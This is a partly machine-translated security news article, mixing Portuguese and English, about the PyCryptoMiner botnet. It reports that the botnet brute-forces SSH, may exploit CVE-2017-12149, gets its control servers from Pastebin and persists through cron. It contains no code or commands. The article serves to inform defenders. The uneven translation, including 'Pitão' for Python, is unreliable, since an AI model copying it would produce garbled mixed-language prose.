PyCryptoMiner mira máquinas Linux para minerar o Monero

WaterMiner Monero Miner

A Linux-based Monero miner botnet, which has been dubbed PyCryptoMiner foi descoberto por pesquisadores de segurança. The botnet which is based on a cryptocurrency miner has earned cybercriminals at least 158 Monero que equivale a $63,000.

PyCryptoMiner has been written in Python which has made it possible for the botnet’s operators to keep it under the radar.

Unlike a binary malware alternative, a scripting language-based malware is more evasive by nature as it can be easily obfuscated. It is also executed by a legitimate binary, which could be one of the PERL/Python/Bash/Go/PowerShell interpreters shipped with almost every Linux/Windows distribution,” researchers from F5 Networks said in their relatório.

Story relacionado: CryptoLoot Coinhive Monero Miner - Como remover do seu PC

PyCryptoMiner Technical Details

Whoever is operating this botnet is also using brute-force attacks targeting Linux systems with exposed SSH ports. In case the password is uncovered then cybercriminals deploy Python scripts and install the Monero miner malware.

Researchers also believe that cybercriminals are also using an exploit for the JBoss server in their campaign which has been identified as CVE-2017-12149. Contudo, the deployment of brute-force and the exploit of SSH are also part of cybercriminals’ attack arsenal.

O que é interessante é que o PyCryptoMiner botnet doesn’t have hard-coded addresses of its command and control servers as it receives them from Pastebin posts. The botnet is also capable of acting as a scanner node meaning that it scans the Internet for Linux machines with open SSH ports, and attempts to guess the SSH logins. In case of a success, the malware uses a simple base64-encoded spearhead Python script which connects to the command and control server to execute more Python code, disseram pesquisadores. The script itself is positioned in the main controller bot and is capable of the following activities:

  • Becoming persistent on the compromised machine by registering as a cron job ( a time-based job scheduler in Unix-like computer operating systems);
  • Collecting details about the compromised machine like information on the number of CPUs.
  • Collected information is typically sent to the command and control server.
Story relacionado: WaterMiner Monero Miner é o mais recente criptomoeda Malware

PyCryptoMiner Botnet Activity

Pelo visto, the botnet is currently inactive, as its servers are offline. Não obstante, this doesn’t mean that it won’t be reactivated in new malicious and crypto mining campaigns. If the botnet operator updates the Pastebin posts to point to a new command and control server, then the botnet can quickly be brought back online.

Como já mencionado, the botnet is also designed to dig for potential exploit possibilities of CVE-2017-12149, a recently disclosed vulnerability. This means that vulnerable JBoss servers may be the next target of the PyCryptoMiner.

Milena Dimitrova

Milena Dimitrova

Um escritor inspirado e gerente de conteúdo que está com SensorsTechForum desde o início do projeto. Um profissional com 10+ anos de experiência na criação de conteúdo envolvente. Focada na privacidade do usuário e desenvolvimento de malware, ela acredita fortemente em um mundo onde a segurança cibernética desempenha um papel central. Se o senso comum não faz sentido, ela vai estar lá para tomar notas. Essas notas podem mais tarde se transformar em artigos! Siga Milena @Milenyim

mais Posts

Me siga:

3 Comentários
  1. AvatarLinux User

    This is hardly a malware. If you get access to the machine, you can do a lot of things other than just running a mining script.

    1. AvatarVencislav Krustev

      Olá, sim, but it all comes down to who configured it. Some malware authors often aim to embed legitimate miners in malware applications and add otherthingsthat the malware does. These are functions, that help it to propagate as well as self-update, copy itself and remain obfuscated.

    2. AvatarMartin Beltov

      As it is stated in the article the miner is part of an extensive Pitão that is modular in nature. As a consequence the hacker operators can execute a variety of malware behaviour.

      Due to the recent rise of miners it is important for us to track all current events.


Deixe um comentário

seu endereço de e-mail não será publicado. Campos obrigatórios são marcados *

limite de tempo está esgotado. Recarregue CAPTCHA.

Compartilhar no Facebook Compartilhar
Compartilhar no Twitter chilrear
Compartilhar no Google Plus Compartilhar
Partilhar no Linkedin Compartilhar
Compartilhar no Digg Compartilhar
Compartilhar no Reddit Compartilhar
Partilhar no StumbleUpon Compartilhar